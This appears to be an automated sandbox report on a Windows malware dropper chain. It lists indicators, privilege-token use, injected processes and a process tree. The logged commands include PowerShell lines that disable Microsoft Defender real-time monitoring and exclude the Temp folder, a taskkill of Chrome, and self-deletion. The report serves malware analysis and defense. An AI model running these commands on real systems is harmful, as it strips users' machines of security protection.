04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 606 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2945 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 226 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 504 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 508 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 599 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeMon17a0d8ec302e.exeMon17bbf11fdb575d.tmpMon178e7a516181.exepid process 368 powershell.exe 368 powershell.exe 600 powershell.exe 600 powershell.exe 600 powershell.exe 368 powershell.exe 2300 Mon17a0d8ec302e.exe 2300 Mon17a0d8ec302e.exe 3988 Mon17bbf11fdb575d.tmp 3988 Mon17bbf11fdb575d.tmp 368 powershell.exe 600 powershell.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEfoldershare.exepid process 2580 Explorer.EXE 4944 foldershare.exe -
Suspicious behavior: MapViewOfSection 51 IoCs
Processes:
Mon17a0d8ec302e.exepQnAbYmg3ChB2IJbQyaavv5U.exeBRFaifqDEarEZCox1Bk4206c.exeZz_Kz0VjFFF_1CMdwOqI2jwN.execscript.exejxI5xrUu3jnl7Xc0smG8sEXe.exeMicrosoftEdgeCP.exebwgirdwbwgirdwMicrosoftEdgeCP.exebwgirdwMicrosoftEdgeCP.exebwgirdwMicrosoftEdgeCP.exeMicrosoftEdgeCP.exebwgirdwbwgirdwbwgirdwpid process 2300 Mon17a0d8ec302e.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5376 BRFaifqDEarEZCox1Bk4206c.exe 5376 BRFaifqDEarEZCox1Bk4206c.exe 5376 BRFaifqDEarEZCox1Bk4206c.exe 5764 Zz_Kz0VjFFF_1CMdwOqI2jwN.exe 6072 cscript.exe 6072 cscript.exe 7564 jxI5xrUu3jnl7Xc0smG8sEXe.exe 6072 cscript.exe 6072 cscript.exe 6072 cscript.exe 6072 cscript.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 7288 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 7604 bwgirdw 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 6660 bwgirdw 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 5400 bwgirdw 1188 MicrosoftEdgeCP.exe 1188 MicrosoftEdgeCP.exe 7604 bwgirdw 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe 7208 bwgirdw 8444 bwgirdw 8396 bwgirdw 2884 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
671081.execli.exepid process 4120 671081.exe 7280 cli.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Mon17870faab0.exeMon178d8e5d06822.exeMon17332e41e6b.exepowershell.exepowershell.exeWerFault.exeExplorer.EXEDownFlSetup110.exechrome.exechrome2.exeWerFault.exeWerFault.exetaskkill.exechrome3.exeWerFault.exedescription pid process Token: SeCreateTokenPrivilege 1048 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 1048 Mon17870faab0.exe Token: SeLockMemoryPrivilege 1048 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 1048 Mon17870faab0.exe Token: SeMachineAccountPrivilege 1048 Mon17870faab0.exe Token: SeTcbPrivilege 1048 Mon17870faab0.exe Token: SeSecurityPrivilege 1048 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 1048 Mon17870faab0.exe Token: SeLoadDriverPrivilege 1048 Mon17870faab0.exe Token: SeSystemProfilePrivilege 1048 Mon17870faab0.exe Token: SeSystemtimePrivilege 1048 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 1048 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 1048 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 1048 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 1048 Mon17870faab0.exe Token: SeBackupPrivilege 1048 Mon17870faab0.exe Token: SeRestorePrivilege 1048 Mon17870faab0.exe Token: SeShutdownPrivilege 1048 Mon17870faab0.exe Token: SeDebugPrivilege 1048 Mon17870faab0.exe Token: SeAuditPrivilege 1048 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 1048 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 1048 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 1048 Mon17870faab0.exe Token: SeUndockPrivilege 1048 Mon17870faab0.exe Token: SeSyncAgentPrivilege 1048 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 1048 Mon17870faab0.exe Token: SeManageVolumePrivilege 1048 Mon17870faab0.exe Token: SeImpersonatePrivilege 1048 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 1048 Mon17870faab0.exe Token: 31 1048 Mon17870faab0.exe Token: 32 1048 Mon17870faab0.exe Token: 33 1048 Mon17870faab0.exe Token: 34 1048 Mon17870faab0.exe Token: 35 1048 Mon17870faab0.exe Token: SeDebugPrivilege 1552 Mon178d8e5d06822.exe Token: SeDebugPrivilege 2288 Mon17332e41e6b.exe Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeRestorePrivilege 4288 WerFault.exe Token: SeBackupPrivilege 4288 WerFault.exe Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeDebugPrivilege 4288 WerFault.exe Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeDebugPrivilege 4452 DownFlSetup110.exe Token: SeDebugPrivilege 4796 chrome.exe Token: SeDebugPrivilege 4968 chrome2.exe Token: SeDebugPrivilege 4816 WerFault.exe Token: SeDebugPrivilege 5068 WerFault.exe Token: SeDebugPrivilege 4916 taskkill.exe Token: SeDebugPrivilege 4712 chrome3.exe Token: SeDebugPrivilege 4828 WerFault.exe Token: SeShutdownPrivilege 2580 Explorer.EXE -
Suspicious use of FindShellTrayWindow 28 IoCs
Processes:
Mon17bbf11fdb575d.tmpExplorer.EXEinstaller.exeCalculator.exeinstaller.exepid process 3988 Mon17bbf11fdb575d.tmp 2580 Explorer.EXE 2580 Explorer.EXE 7880 installer.exe 2580 Explorer.EXE 2580 Explorer.EXE 1416 Calculator.exe 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 5480 installer.exe 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE -
Suspicious use of SetWindowsHookEx 19 IoCs
Processes:
Explorer.EXEMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.execmd.exepid process 2580 Explorer.EXE 8008 MicrosoftEdge.exe 6644 MicrosoftEdgeCP.exe 7420 MicrosoftEdge.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1168 MicrosoftEdge.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7972 MicrosoftEdge.exe 1188 MicrosoftEdgeCP.exe 1188 MicrosoftEdgeCP.exe 9164 MicrosoftEdge.exe 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 4260 MicrosoftEdge.exe 2884 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe 5960 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2868 wrote to memory of 700 2868 setup_x86_x64_install.exe setup_installer.exe PID 2868 wrote to memory of 700 2868 setup_x86_x64_install.exe setup_installer.exe PID 2868 wrote to memory of 700 2868 setup_x86_x64_install.exe setup_installer.exe PID 700 wrote to memory of 3852 700 setup_installer.exe setup_install.exe PID 700 wrote to memory of 3852 700 setup_installer.exe setup_install.exe PID 700 wrote to memory of 3852 700 setup_installer.exe setup_install.exe PID 3852 wrote to memory of 3172 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3172 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3172 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 4064 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 4064 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 4064 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1912 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1912 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1912 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 392 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 392 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 392 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3040 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3040 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3040 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 2760 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 2760 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 2760 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 2036 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 2036 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 2036 3852 setup_install.exe cmd.exe PID 4064 wrote to memory of 600 4064 cmd.exe powershell.exe PID 4064 wrote to memory of 600 4064 cmd.exe powershell.exe PID 4064 wrote to memory of 600 4064 cmd.exe powershell.exe PID 3172 wrote to memory of 368 3172 cmd.exe powershell.exe PID 3172 wrote to memory of 368 3172 cmd.exe powershell.exe PID 3172 wrote to memory of 368 3172 cmd.exe powershell.exe PID 3852 wrote to memory of 364 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 364 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 364 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 676 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 676 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 676 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1076 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1076 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1076 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3944 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3944 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 3944 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1744 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1744 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1744 3852 setup_install.exe cmd.exe PID 392 wrote to memory of 944 392 cmd.exe Mon178e7a516181.exe PID 392 wrote to memory of 944 392 cmd.exe Mon178e7a516181.exe PID 392 wrote to memory of 944 392 cmd.exe Mon178e7a516181.exe PID 676 wrote to memory of 884 676 cmd.exe Mon179f74c0ff3cf1f.exe PID 676 wrote to memory of 884 676 cmd.exe Mon179f74c0ff3cf1f.exe PID 676 wrote to memory of 884 676 cmd.exe Mon179f74c0ff3cf1f.exe PID 3852 wrote to memory of 344 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 344 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 344 3852 setup_install.exe cmd.exe PID 1912 wrote to memory of 1048 1912 cmd.exe Mon17870faab0.exe PID 1912 wrote to memory of 1048 1912 cmd.exe Mon17870faab0.exe PID 1912 wrote to memory of 1048 1912 cmd.exe Mon17870faab0.exe PID 3852 wrote to memory of 1320 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1320 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1320 3852 setup_install.exe cmd.exe PID 3852 wrote to memory of 1424 3852 setup_install.exe cmd.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
cscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer cscript.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2504
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2796
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
PID:2736 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:5300
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17870faab0.exeMon17870faab0.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:7840
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4512
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe5⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe6⤵
- Executes dropped EXE
PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe5⤵PID:2036
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon173a360b525.exeMon173a360b525.exe6⤵
- Executes dropped EXE
PID:3096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6831137645.exe"7⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\6831137645.exe"C:\Users\Admin\AppData\Local\Temp\6831137645.exe"8⤵
- Executes dropped EXE
PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1607525511.exe"7⤵PID:2920
-
C:\Users\Admin\AppData\Local\Temp\1607525511.exe"C:\Users\Admin\AppData\Local\Temp\1607525511.exe"8⤵PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon173a360b525.exe" & exit7⤵PID:4364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon173a360b525.exe" /f8⤵
- Kills process with taskkill
PID:8140
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone5⤵PID:2760
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone6⤵
- Executes dropped EXE
PID:1520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 6647⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 6807⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 6367⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 7327⤵
- Program crash
PID:4672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 8847⤵
- Program crash
PID:4580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 9287⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 11047⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4892
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe5⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon178e7a516181.exeMon178e7a516181.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:944 -
C:\Users\Admin\Pictures\Adobe Films\KWw_Na9PoK6E2at8khQXjitr.exe"C:\Users\Admin\Pictures\Adobe Films\KWw_Na9PoK6E2at8khQXjitr.exe"7⤵
- Executes dropped EXE
PID:516
-
-
C:\Users\Admin\Pictures\Adobe Films\8t8B84uCRSWE3mwZuTRWxKhE.exe"C:\Users\Admin\Pictures\Adobe Films\8t8B84uCRSWE3mwZuTRWxKhE.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5292 -
C:\Users\Admin\AppData\Local\Temp\cli.exe"C:\Users\Admin\AppData\Local\Temp\cli.exe"8⤵
- Suspicious behavior: SetClipboardViewer
PID:7280
-
-
-
